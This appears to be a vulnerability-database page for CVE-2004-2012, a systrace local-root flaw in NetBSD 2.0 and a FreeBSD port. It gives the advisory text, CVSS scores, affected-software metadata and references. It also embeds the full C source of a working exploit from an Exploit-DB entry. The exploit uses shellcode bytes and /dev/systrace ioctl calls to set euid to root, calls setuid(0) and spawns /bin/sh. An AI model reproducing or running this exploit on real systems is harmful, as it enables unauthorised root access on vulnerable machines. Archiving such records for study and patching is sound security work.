ID CVE-2004-2012Type cveReporter cve@mitre.orgModified 2017-07-11T01:31:00
Description
The systrace_exit function in the systrace utility for NetBSD-current and 2.0 before April 16, 2004, and certain FreeBSD ports, does not verify the owner of the /dec/systrace connection before setting euid to 0, which allows local users to gain root privileges.
{"id": "CVE-2004-2012", "bulletinFamily": "NVD", "title": "CVE-2004-2012", "description": "The systrace_exit function in the systrace utility for NetBSD-current and 2.0 before April 16, 2004, and certain FreeBSD ports, does not verify the owner of the /dec/systrace connection before setting euid to 0, which allows local users to gain root privileges.", "published": "2004-12-31T05:00:00", "modified": "2017-07-11T01:31:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2012", "reporter": "cve@mitre.org", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/16110", "http://secunia.com/advisories/11585", "http://marc.info/?l=bugtraq&m=108432258920570&w=2", "http://www.securityfocus.com/bid/10320", "ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2004-007.txt.asc"], "cvelist": ["CVE-2004-2012"], "type": "cve", "lastseen": "2021-02-02T05:23:00", "edition": 4, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:24113"]}], "modified": "2021-02-02T05:23:00", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-02-02T05:23:00", "rev": 2}, "vulnersScore": 5.9}, "cpe": ["cpe:/a:vladimir_kotal:systrace_port_for_freebsd:2004-03-09", "cpe:/a:niels:provos_systrace:1.3", "cpe:/a:niels:provos_systrace:1.1", "cpe:/a:niels:provos_systrace:1.5", "cpe:/a:vladimir_kotal:systrace_port_for_freebsd:2004-06-02", "cpe:/a:niels:provos_systrace:1.2", "cpe:/a:niels:provos_systrace:1.4", "cpe:/o:netbsd:netbsd:2.0"], "affectedSoftware": [{"cpeName": "vladimir_kotal:systrace_port_for_freebsd", "name": "vladimir kotal systrace port for freebsd", "operator": "eq", "version": "2004-06-02"}, {"cpeName": "vladimir_kotal:systrace_port_for_freebsd", "name": "vladimir kotal systrace port for freebsd", "operator": "eq", "version": "2004-03-09"}, {"cpeName": "niels:provos_systrace", "name": "niels provos systrace", "operator": "eq", "version": "1.5"}, {"cpeName": "netbsd:netbsd", "name": "netbsd", "operator": "eq", "version": "2.0"}, {"cpeName": "niels:provos_systrace", "name": "niels provos systrace", "operator": "eq", "version": "1.1"}, {"cpeName": "niels:provos_systrace", "name": "niels provos systrace", "operator": "eq", "version": "1.3"}, {"cpeName": "niels:provos_systrace", "name": "niels provos systrace", "operator": "eq", "version": "1.4"}, {"cpeName": "niels:provos_systrace", "name": "niels provos systrace", "operator": "eq", "version": "1.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": true, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:o:netbsd:netbsd:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:niels:provos_systrace:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:niels:provos_systrace:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:niels:provos_systrace:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:vladimir_kotal:systrace_port_for_freebsd:2004-03-09:*:*:*:*:*:*:*", "cpe:2.3:a:niels:provos_systrace:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:niels:provos_systrace:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:vladimir_kotal:systrace_port_for_freebsd:2004-06-02:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:niels:provos_systrace:1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:niels:provos_systrace:1.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vladimir_kotal:systrace_port_for_freebsd:2004-03-09:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vladimir_kotal:systrace_port_for_freebsd:2004-06-02:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:niels:provos_systrace:1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:niels:provos_systrace:1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:niels:provos_systrace:1.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:netbsd:netbsd:2.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "11585", "refsource": "SECUNIA", "tags": [], "url": "http://secunia.com/advisories/11585"}, {"name": "10320", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/10320"}, {"name": "systrace-gain-privileges(16110)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16110"}, {"name": "20040510 Advisory 04/2004: Net(Free)BSD Systrace local root vulnerabilitiy", "refsource": "BUGTRAQ", "tags": [], "url": "http://marc.info/?l=bugtraq&m=108432258920570&w=2"}, {"name": "NetBSD-SA2004-007", "refsource": "NETBSD", "tags": [], "url": "ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2004-007.txt.asc"}]}
{"exploitdb": [{"lastseen": "2016-02-02T22:32:41", "description": "NetBSD/FreeBSD Port Systrace 1.x Exit Routine Access Validation Privilege Escalation Vulnerability. CVE-2004-2012. Local exploit for bsd platform", "published": "2004-05-11T00:00:00", "type": "exploitdb", "title": "NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2012"], "modified": "2004-05-11T00:00:00", "id": "EDB-ID:24113", "href": "https://www.exploit-db.com/exploits/24113/", "sourceData": "source: http://www.securityfocus.com/bid/10320/info\r\n\r\nA vulnerability has been reported that affects Systrace on NetBSD, as well as the FreeBSD port by Vladimir Kotal. \r\n\r\nThe source of the issue is insufficient access validation when a systraced process is restoring privileges. \r\n\r\nThis issue can be exploited by a local attacker to gain root privileges on a vulnerable system.\r\n\r\n#include <stdio.h>\r\n#include <sys/ioctl.h>\r\n#include <fcntl.h>\r\n#include <sys/systrace.h>\r\n\r\n#define systrace_device \"/dev/systrace\"\r\n\r\nchar MAGIC[] = \"\\x53\\x31\\xc0\\x50\\x50\\x50\\x50\\xb8\\x03\\x00\\x00\\x00\"\r\n \"\\xcd\\x80\\x83\\xc4\\x10\\xb8\\x00\\x00\\xc0\\xbf\\x94\\x50\"\r\n \"\\xb8\\x03\\x00\\x00\\x00\\xcd\\x80\\x5b\\x87\\xe3\\x5b\\xc3\";\r\n\r\nvoid (*magic)(void) = MAGIC;\r\n\r\nint nbsd_systrace_open()\r\n{\r\n int fd;\r\n\r\n printf(\"[+] Connecting to %s... \", systrace_device);\r\n fd = open(systrace_device, O_RDONLY, 0);\r\n if (fd == -1) {\r\n perror(\"failed with error: \");\r\n printf(\"\\nSorry but the exploit failed\\n\");\r\n exit(1);\r\n }\r\n printf(\"done.\\n\");\r\n\r\n return (fd);\r\n}\r\n\r\nint nbsd_attach_parent(int fd)\r\n{\r\n pid_t pid = getppid();\r\n\r\n printf(\"[+] Attaching to parent... \");\r\n if (ioctl(fd, STRIOCATTACH, &pid) == -1) {\r\n perror(\"failed with error: \");\r\n printf(\"\\nSorry but the exploit failed\\n\");\r\n }\r\n printf(\"done.\\n\");\r\n return (0);\r\n}\r\n\r\nvoid nbsd_handle_msg(int fd)\r\n{\r\n struct str_message msg;\r\n struct systrace_answer ans;\r\n int r;\r\n\r\n r = read(fd, &msg, sizeof(msg));\r\n\r\n if (r != sizeof(msg)) {\r\n exit(1);\r\n }\r\n\r\n memset(&ans, 0, sizeof(ans));\r\n ans.stra_pid = msg.msg_pid;\r\n ans.stra_seqnr = msg.msg_seqnr;\r\n ans.stra_policy = SYSTR_POLICY_PERMIT;\r\n ans.stra_flags =\r\nSYSTR_FLAGS_RESULT|SYSTR_FLAGS_SETEUID|SYSTR_FLAGS_SETEUID;\r\n ans.stra_error = 0;\r\n ans.stra_seteuid = getuid();\r\n ans.stra_setegid = getgid();\r\n\r\n if (ioctl(fd, STRIOCANSWER, &ans) == -1);\r\n\r\n}\r\n\r\nvoid doit()\r\n{\r\n int p,f,fd;\r\n\r\n fd = nbsd_systrace_open();\r\n\r\n f = fork();\r\n\r\n if (f == 0) {\r\n sleep(1);\r\n nbsd_attach_parent(fd);\r\n while (1) {\r\n nbsd_handle_msg(fd);\r\n }\r\n exit(1);\r\n }\r\n printf(\"[+] Doing some magic... \");\r\n sleep(2);\r\n magic();\r\n\r\n setuid(0);\r\n setgid(0);\r\n\r\n kill(f, 9);\r\n\r\n if (getuid() != 0) {\r\n printf(\"failed.\\n\");\r\n printf(\"\\nSorry but the exploit failed.\");\r\n exit(1);\r\n }\r\n\r\n printf(\"done.\\n\\n\");\r\n\r\n system(\"uname -v\");\r\n system(\"id\");\r\n execlp(\"/bin/sh\", \"/bin/sh\", 0);\r\n}\r\n\r\nvoid banner()\r\n{\r\n printf(\"NetBSD/x86 systrace local root exploit\\n\");\r\n printf(\"by ziegenpeter\\n\\n\");\r\n\r\n if (getuid() == 0) {\r\n printf(\"no comment\\n\");\r\n exit(1);\r\n }\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int fd;\r\n banner();\r\n doit();\r\n return (0);\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24113/"}]}
